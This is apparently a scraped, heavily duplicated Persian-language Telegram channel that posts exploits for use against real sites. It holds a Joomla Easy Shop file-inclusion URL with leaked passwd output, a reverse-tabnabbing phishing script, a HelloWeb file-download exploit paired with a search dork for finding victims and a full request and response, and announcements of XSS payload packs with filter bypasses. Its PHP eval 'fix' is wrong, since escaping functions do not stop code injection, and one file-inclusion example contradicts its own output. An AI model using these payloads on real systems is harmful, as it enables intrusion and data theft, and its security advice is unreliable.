🔰#PCI Php Code Injection #Vulnerable
➖➖➖➖➖➖➖➖➖➖
❇️ سلام خدمت دوستان و همراهان عزیز ❇️
🔆 در این ویدئو که برای شما اماده شده به نحوه ی استفاده از Php Code Injection در سه سطح :
(Levels = Low, Medium, High)
بیان شده است.
نحوه ی fix یا Patch باگ : پست بعدی
امیدبران است که مفید واقع شده باشد.
➖➖➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
➖➖➖➖➖➖➖➖➖➖
❇️ سلام خدمت دوستان و همراهان عزیز ❇️
🔆 در این ویدئو که برای شما اماده شده به نحوه ی استفاده از Php Code Injection در سه سطح :
(Levels = Low, Medium, High)
بیان شده است.
نحوه ی fix یا Patch باگ : پست بعدی
امیدبران است که مفید واقع شده باشد.
➖➖➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
php injection bug.rar
13.5 MB
🔰#PCI Php Code Injection #Vulnerable
➖➖➖➖➖➖➖➖➖➖
❇️ سلام خدمت دوستان و همراهان عزیز ❇️
🔆 در این ویدئو که برای شما اماده شده به نحوه ی استفاده از Php Code Injection در سه سطح :
(Levels = Low, Medium, High)
بیان شده است.
نحوه ی fix یا Patch باگ : پست بعدی
امیدبران است که مفید واقع شده باشد.
➖➖➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
➖➖➖➖➖➖➖➖➖➖
❇️ سلام خدمت دوستان و همراهان عزیز ❇️
🔆 در این ویدئو که برای شما اماده شده به نحوه ی استفاده از Php Code Injection در سه سطح :
(Levels = Low, Medium, High)
بیان شده است.
نحوه ی fix یا Patch باگ : پست بعدی
امیدبران است که مفید واقع شده باشد.
➖➖➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
🔰#PCI Php Code Injection #Vulnerable #Ptchor #Fix
➖➖➖➖➖➖➖➖➖➖
❇️ نحوه ی **Fix** یا **Patch** باگ ❇️
این اسیب پذیری در موقعی رخ میدهد که یک برنامه نویسی از تابع
[localhost]//index.php?Amir=1
برای اینکه امکان inject کردن کد های php نباشد شما میتوانید
از توابع زیر استفاده کنید :
▪️mysql_real_escape_string()
▪️htmlentities()
▪️htmlspecialchars()
▪️strip_tags()
▪️addslashes()
نحوه ی استفاده از اونا به برنامه نویس بستگی داره که معمولا به صورت :
باتشکر
➖➖➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
➖➖➖➖➖➖➖➖➖➖
❇️ نحوه ی **Fix** یا **Patch** باگ ❇️
این اسیب پذیری در موقعی رخ میدهد که یک برنامه نویسی از تابع
eval();
در php استفاده کند. مانند نمونه کد زیر : $myvar = "varname";
$x = $_GET['Amir'];
eval("\$myvar = \$x;");
بازتاب ان در سایت : [localhost]//index.php?Amir=1
برای اینکه امکان inject کردن کد های php نباشد شما میتوانید
از توابع زیر استفاده کنید :
▪️mysql_real_escape_string()
▪️htmlentities()
▪️htmlspecialchars()
▪️strip_tags()
▪️addslashes()
نحوه ی استفاده از اونا به برنامه نویس بستگی داره که معمولا به صورت :
eval(htmlspecialchars("\$myvar = \$x;"));
میباشد.باتشکر
➖➖➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
Telegram
AttachLearnExploit
👍1
💠🌐🌀
🔰⚜️
💢
#Joomla (Joomla!) #Component #EasyShop (Easy Shop) v 1.2.3 #LFI Local File Inclusion #Vulnerable
➖➖➖➖➖➖➖➖
آسیب پذیری LFI در کامپوننته Easy Shop جوملا :
#~Exploit Title :
〰〰〰〰
#~Path :
آدرسی باگ :
〰〰〰〰
#~Exploit :
نحوه ی اکسپلویت :
== > برای اینکه اکسپلویت اجرا بشه باید دستورات رو بصورت کاراکتر های Base64 انکود کنید و به اخر url اضافه کنید
مانند :
`/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=`
اگر قسمت انکود شده را دیکود کنیم برابر با عبارت زیر میشود :
بخشی از پاسخی که سایت برای ما برمیگردونه :
`root:x:0:0:root:/root:/bin/bash`
〰〰〰〰
برای اینکه بتوانید دستورات خودتون را انکود کنید بهترین راه استفاده از BurpSuite است.(در تب Decoder )
〰〰〰〰
Software Link
➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
🔰⚜️
💢
#Joomla (Joomla!) #Component #EasyShop (Easy Shop) v 1.2.3 #LFI Local File Inclusion #Vulnerable
➖➖➖➖➖➖➖➖
آسیب پذیری LFI در کامپوننته Easy Shop جوملا :
#~Exploit Title :
Joomla! Component Easy Shop 1.2.3 - Local File Inclusion
〰〰〰〰
#~Path :
آدرسی باگ :
http://localhost/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=
〰〰〰〰
#~Exploit :
نحوه ی اکسپلویت :
== > برای اینکه اکسپلویت اجرا بشه باید دستورات رو بصورت کاراکتر های Base64 انکود کنید و به اخر url اضافه کنید
مانند :
`/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=`
اگر قسمت انکود شده را دیکود کنیم برابر با عبارت زیر میشود :
../../configuration.php
بخشی از پاسخی که سایت برای ما برمیگردونه :
`root:x:0:0:root:/root:/bin/bash`
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
〰〰〰〰
برای اینکه بتوانید دستورات خودتون را انکود کنید بهترین راه استفاده از BurpSuite است.(در تب Decoder )
〰〰〰〰
Software Link
➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
Telegram
AttachLearnExploit
🔰 #CloudMe_Sync v1.11.2 #Buffer_Overflow ( #BoF ) and #Egghunt #Vulnerable
➖➖➖➖➖➖➖
آسیب پذیری سرریزبافر در برنامه CloudMe_Sync v1.11.2 :
#~Exploit Title:
CloudMe Sync v1.11.2 Buffer Overflow + Egghunt
〰〰〰〰〰
#~Description :
نحوه ی کار کردن با اکسپلویت و باگ در اینجا کلیک کنید.
〰〰〰〰〰
#~Software and Exploit :
💲 Software
💲 Exploit
➖➖➖➖➖➖➖
@LearnExploit — > IR0Day.Today Boy's
➖➖➖➖➖➖➖
آسیب پذیری سرریزبافر در برنامه CloudMe_Sync v1.11.2 :
#~Exploit Title:
CloudMe Sync v1.11.2 Buffer Overflow + Egghunt
〰〰〰〰〰
#~Description :
نحوه ی کار کردن با اکسپلویت و باگ در اینجا کلیک کنید.
〰〰〰〰〰
#~Software and Exploit :
💲 Software
💲 Exploit
➖➖➖➖➖➖➖
@LearnExploit — > IR0Day.Today Boy's
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
#BufferOverFlow (#BOF) #Bug
———————
سلام دوستان در این ویدویی اموزش یاد میگیرید که چطوری از باگ BoF استفاده کنید و از سیستم شل بگرید.
———————-
Dl Link :
yon.ir/bakJW
———————-
Recorded By Ashkan Mogadas
———————-
T.me/LearnExploit
0Day.Today Boy's
———————
سلام دوستان در این ویدویی اموزش یاد میگیرید که چطوری از باگ BoF استفاده کنید و از سیستم شل بگرید.
———————-
Dl Link :
yon.ir/bakJW
———————-
Recorded By Ashkan Mogadas
———————-
T.me/LearnExploit
0Day.Today Boy's
#Wordpress #Plugin #Wisechat <= V 2.6.3 - #Reverse #Tabnabbing - #Vulnerable #Vuln (Vulnerable)
➖➖➖➖➖➖➖➖➖➖
آسیب پذیری - برگه ی معکوس یا صفحه ی دزدی معکوس ( Reverse Tabnabbing ) در پلاگین WiseChat وردپرس :
✅ Exploit Title :
Wordpress Plugin Wisechat <= 2.6.3 - Reverse Tabnabbing
➖➖
✅ Exploit :
🔰 Description :
#توضیحات :
وقتی کاربر روی لینک مخرب کلیک میکنید محتویات لینک مخرب در تب جدید اما درخوده URL سایت به ما نمایش داده میشود
برای فهمیدن روی عکس ها کلیک کنید :
1 - Pic_1
2 - Pic_2
➖➖
✅ Demo WiseChat :
دمو پلاگین
➖➖
✅ About Reverse Tabnabbing :
اطلاعات بیشتر در مورد آسیب پذیری برگه ی معکوس در پست بعدی.
با تشکر از همراهی شما دوستان...
➖➖➖➖➖➖➖➖➖➖
⛓ ++ > @LearnExploit <++
➖➖➖➖➖➖➖➖➖➖
آسیب پذیری - برگه ی معکوس یا صفحه ی دزدی معکوس ( Reverse Tabnabbing ) در پلاگین WiseChat وردپرس :
✅ Exploit Title :
Wordpress Plugin Wisechat <= 2.6.3 - Reverse Tabnabbing
➖➖
✅ Exploit :
<html>
<script>
if (window.opener) window.opener.parent.location.replace(' #Pishing Page');
if (window.parent != window) window.parent.location.replace('#Pishing Page');
</script>
Open Redirect TEST
</html>
➖➖🔰 Description :
#توضیحات :
وقتی کاربر روی لینک مخرب کلیک میکنید محتویات لینک مخرب در تب جدید اما درخوده URL سایت به ما نمایش داده میشود
برای فهمیدن روی عکس ها کلیک کنید :
1 - Pic_1
2 - Pic_2
➖➖
✅ Demo WiseChat :
دمو پلاگین
➖➖
✅ About Reverse Tabnabbing :
اطلاعات بیشتر در مورد آسیب پذیری برگه ی معکوس در پست بعدی.
با تشکر از همراهی شما دوستان...
➖➖➖➖➖➖➖➖➖➖
⛓ ++ > @LearnExploit <++
#About #Reverse #Tabnabbing #Vulnerable ::
➖➖➖➖➖➖➖
✅ برگه ی معکوس یا صفحه دزدی معکوس ::
به طور خلاصه، در Reverse Tabnabbing وقتی بر روی یک لینک در صفحه وب کلیک می کنیم تا صفحه ای جدید باز شود و آن صفحه هم باز می شود اما وقتی که به صفحه قبلی باز می گردیم همه چیز به ظاهر عادی است اما در واقع پشت سر ما تغییراتی صورت گرفته و به وضوح می توان تغییر را در آدرس اینترنتی آن صفحه مشاهده کرد. اما بسیاری از کاربران متوجه تغییر در URL نمی شوند.
وقتی که به صفحه اصلی بر می گردیم، امکان دارد از ما خواسته شود که بار دیگر وارد حساب کاربری شویم. مهاجمان در واقع صفحه اصلی را با محتوی مخرب تعویض کرده اند، این تغییرات شامل فاویکون و نوار آدرس سایت می شود اما ما متوجه آن نمی شویم. اطلاعات کاربری مان را وارد کرده و هک می شویم.
➖➖➖
🔰 demo Bug :
برای مشاهده ی نحوه ی کار کردن روی لینک کلیک کنید.
با تشکر از همراهی شما.
➖➖➖
⛓ ++ > @LearnExploit <++
➖➖➖➖➖➖➖
✅ برگه ی معکوس یا صفحه دزدی معکوس ::
Reverse Tabnabbing
نوعی صفحه دزدی است که در فهرست حمله های فیشینگ (Phishing) قرار می گیرد و در آن مهاجم به کمک window.opener.location.assign()
صفحه ای قانونی و قابل اعتماد ایجاد می کند که در آن محتوی مخرب وجود دارد.به طور خلاصه، در Reverse Tabnabbing وقتی بر روی یک لینک در صفحه وب کلیک می کنیم تا صفحه ای جدید باز شود و آن صفحه هم باز می شود اما وقتی که به صفحه قبلی باز می گردیم همه چیز به ظاهر عادی است اما در واقع پشت سر ما تغییراتی صورت گرفته و به وضوح می توان تغییر را در آدرس اینترنتی آن صفحه مشاهده کرد. اما بسیاری از کاربران متوجه تغییر در URL نمی شوند.
وقتی که به صفحه اصلی بر می گردیم، امکان دارد از ما خواسته شود که بار دیگر وارد حساب کاربری شویم. مهاجمان در واقع صفحه اصلی را با محتوی مخرب تعویض کرده اند، این تغییرات شامل فاویکون و نوار آدرس سایت می شود اما ما متوجه آن نمی شویم. اطلاعات کاربری مان را وارد کرده و هک می شویم.
➖➖➖
🔰 demo Bug :
برای مشاهده ی نحوه ی کار کردن روی لینک کلیک کنید.
با تشکر از همراهی شما.
➖➖➖
⛓ ++ > @LearnExploit <++
Telegram
AttachLearnExploit
Pic_1
#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
ابتدا توضیح مختصری در مورد باگ Arbitrary File Download بدیم :
به زبان ساده اگر توضیح بدم نوع دیگری از باگ ها LFI/RFI میباشد.
با این تفاوت که شما در این باگ قابلیت Travel Dir روندارین! یعنی نمیتونید بین مسیرهای موجود گشت و گذار کنید و فقط میتونید فایل یا فایل های مد نظر رو دانلود کنید.(البته بعضی از پارامتر های موجود این قابلیت رو داره).
اگه هنوز با باگ های LFI و RFI اشنا نیستید روی لینک های زیر کلیک کنید.
Link
➖➖➖➖➖➖➖➖➖➖➖
#Exploit-Title : ( HelloWeb 2.0 - Arbitrary File Download )
#Dork : ( Inurl:exec/file/download.asp )
#vulnerable-Code :
➖➖
filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")
➖➖
root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)
attachfile = root_path & filepath & "\" & filename
➖➖
Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)
➖➖
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
➖➖
objStream.Type = 1
objStream.LoadFromFile attachfile
➖➖
Response.BinaryWrite objStream.Read
Response.Flush
➖➖➖➖➖
طبق کد های مد نظر! این کد ها دسترسی دانلود فایل روبرای ما میده.
پارامتر هایی که اسیبپذیر هستند :
filtepath - filename - root_path - fso - root_folder - attachfile - objStream - strFile
چطوری میتوان از پارامترهای اسیب پذیر استفاده کرد :
به مثال زیر دقت کنید :
https://Target/download.asp?filepath=/&filename=hello.pdf
در این URL ما میفهمیم که فایل Download.asp اجازه ی دانلود فایل از مسیر / ( مسیر فعلی که ما هستیم)و فایل hello.pdf رو داده ...
➖➖➖➖➖➖➖➖➖
نحوه ی اکسپلویت این باگ :
#Exploit :
ابتدا با استفاده از دورک سایت اسیب پذیر رو پیدا کنید.
سپس
exec/file/download.asp?filepath=/&filename=web.config
روبه اخر هدفتون اضافه کنید.
البته این یک نمونه هست !
شما میتونید فایل های بیشتری رو با پارامتر متفاوت تست کنید.
➖➖➖➖➖➖➖➖
#PoC
تست :
این تست روی لوکال هاست صورت گرفته.
GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
➖➖➖➖➖➖➖➖➖
RESPONSE: (پاسخ)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close
➖➖➖
نحوه ی Fix این باگ تو پست بعدی براتون شرح میدم.
امیدوارم که با کارتون بیاد...
هرگونه سوالی داشتید میتونید توی گروه بپرسید.
#X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
ابتدا توضیح مختصری در مورد باگ Arbitrary File Download بدیم :
به زبان ساده اگر توضیح بدم نوع دیگری از باگ ها LFI/RFI میباشد.
با این تفاوت که شما در این باگ قابلیت Travel Dir روندارین! یعنی نمیتونید بین مسیرهای موجود گشت و گذار کنید و فقط میتونید فایل یا فایل های مد نظر رو دانلود کنید.(البته بعضی از پارامتر های موجود این قابلیت رو داره).
اگه هنوز با باگ های LFI و RFI اشنا نیستید روی لینک های زیر کلیک کنید.
Link
➖➖➖➖➖➖➖➖➖➖➖
#Exploit-Title : ( HelloWeb 2.0 - Arbitrary File Download )
#Dork : ( Inurl:exec/file/download.asp )
#vulnerable-Code :
➖➖
filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")
➖➖
root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)
attachfile = root_path & filepath & "\" & filename
➖➖
Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)
➖➖
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
➖➖
objStream.Type = 1
objStream.LoadFromFile attachfile
➖➖
Response.BinaryWrite objStream.Read
Response.Flush
➖➖➖➖➖
طبق کد های مد نظر! این کد ها دسترسی دانلود فایل روبرای ما میده.
پارامتر هایی که اسیبپذیر هستند :
filtepath - filename - root_path - fso - root_folder - attachfile - objStream - strFile
چطوری میتوان از پارامترهای اسیب پذیر استفاده کرد :
به مثال زیر دقت کنید :
https://Target/download.asp?filepath=/&filename=hello.pdf
در این URL ما میفهمیم که فایل Download.asp اجازه ی دانلود فایل از مسیر / ( مسیر فعلی که ما هستیم)و فایل hello.pdf رو داده ...
➖➖➖➖➖➖➖➖➖
نحوه ی اکسپلویت این باگ :
#Exploit :
ابتدا با استفاده از دورک سایت اسیب پذیر رو پیدا کنید.
سپس
exec/file/download.asp?filepath=/&filename=web.config
روبه اخر هدفتون اضافه کنید.
البته این یک نمونه هست !
شما میتونید فایل های بیشتری رو با پارامتر متفاوت تست کنید.
➖➖➖➖➖➖➖➖
#PoC
تست :
این تست روی لوکال هاست صورت گرفته.
GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
➖➖➖➖➖➖➖➖➖
RESPONSE: (پاسخ)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close
➖➖➖
نحوه ی Fix این باگ تو پست بعدی براتون شرح میدم.
امیدوارم که با کارتون بیاد...
هرگونه سوالی داشتید میتونید توی گروه بپرسید.
#X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
——————
0Day.Today
@LearnExploit
@Tech_Army
#XSS #vulnerable #vulnerabilities #Payloads #Private #Priv8 #Part_1
➖➖➖➖➖➖➖➖➖➖
پیلود های اسیب پذیری XSS
»»
»» دانلود در پست بعدی...
#Author : X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖➖➖➖
پیلود های اسیب پذیری XSS
»»
(مفدی نگید کار نمیکنه ،این پیلود هارو باید بلد باشید | البته بعضیا اسونه)
»» دانلود در پست بعدی...
#Author : X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
#XSS #vulnerable #vulnerabilities #Payloads #Private #Priv8 #Part_1
➖➖➖➖➖➖➖➖➖➖
پیلود های اسیب پذیری XSS
»»
نکته : یادم رفت بگم
دوستان علاوه بر اینکه بخش اعظمی از پیلود ها توشه بایپس های زیادی هم به همراه پیلود ها ترکیب شده
»» جهت دانلود کلیککنید.
#Author : X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖➖➖➖
پیلود های اسیب پذیری XSS
»»
(مفدی نگید کار نمیکنه ،این پیلود هارو باید بلد باشید | البته بعضیا اسونه)
نکته : یادم رفت بگم
دوستان علاوه بر اینکه بخش اعظمی از پیلود ها توشه بایپس های زیادی هم به همراه پیلود ها ترکیب شده
»» جهت دانلود کلیککنید.
#Author : X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
Telegram
AttachLearnExploit